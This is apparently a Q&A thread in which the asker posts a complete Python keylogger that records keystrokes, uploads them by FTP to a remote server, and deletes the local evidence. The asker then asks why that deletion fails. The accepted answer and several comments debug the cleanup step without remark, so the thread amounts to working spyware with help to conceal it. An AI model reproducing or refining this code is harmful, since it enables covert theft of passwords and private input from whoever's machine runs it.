# Cannot delete file after upload with Python ftplib

Tags: python, ftp, ftplib

This is my full program:

```
from ftplib import FTP
from keyboard import read_key
from multiprocessing import Process
from os import unlink
from random import random


def send_file(data):
    username = str(int(random() * 10000)) + "m.txt"
    ftp = FTP('***')
    file = open(username, 'x+')
    for stroke in data:
        file.write(stroke)
    data.clear()
    file.close()
    while True:
        try:
            ftp.login(user='***', passwd='***')
            ftp.cwd('key_logger')
            ftp.storbinary("STOR " + username, open(username, 'rb'))
            ftp.quit()
            break
        except Exception:
            ftp.set_pasv(True)
            continue
    unlink(username)


def get_strokes():
    strokes = []
    i = 0
    while True:
        key1 = read_key()
        if i == 0:
            strokes.append(key1)
        elif strokes.__len__() > 20:
            send = Process(target=send_file, args=(strokes, ), name="main")
            send.start()
            strokes.clear()
        i += 1
        i %= 2


if __name__ == '__main__':
    get = Process(target=get_strokes(), args=())
    get.start()
    get.join()
```

I am making a key logger that listens for strokes and saves them in `strokes`.
When `strokes` reaches a certain length, they are saved in a .txt file then sent to my server.

then i need to remove the .txt file with `os.remove()` or `os.unlink`, but neither of them are deleting my file.

Comment: Are you sure giving the correct path?

Comment: I don't see anything obviously wrong with this code.  If the filename didn't exist, you'd get an error from `unlink()`, so that's not the issue.  What is the timestamp on the files that remain?  Perhaps they're left over from some prior version of this program?

Comment: I just noticed that `ftp.storbinary()` does an `open()` on the file, but `close()` is never called.  Perhaps that is the problem?

Comment: i am sure i am giving the correct relative path, since the folder is created and removed within the same function. the path is stored in `username`

Answer (score 1, accepted):

You never close the file that you open to upload. So it is locked and cannot be deleted.

The correct way to upload a file is:

```
with open(username, 'rb') as f:
    ftp.storbinary("STOR " + username, f)
```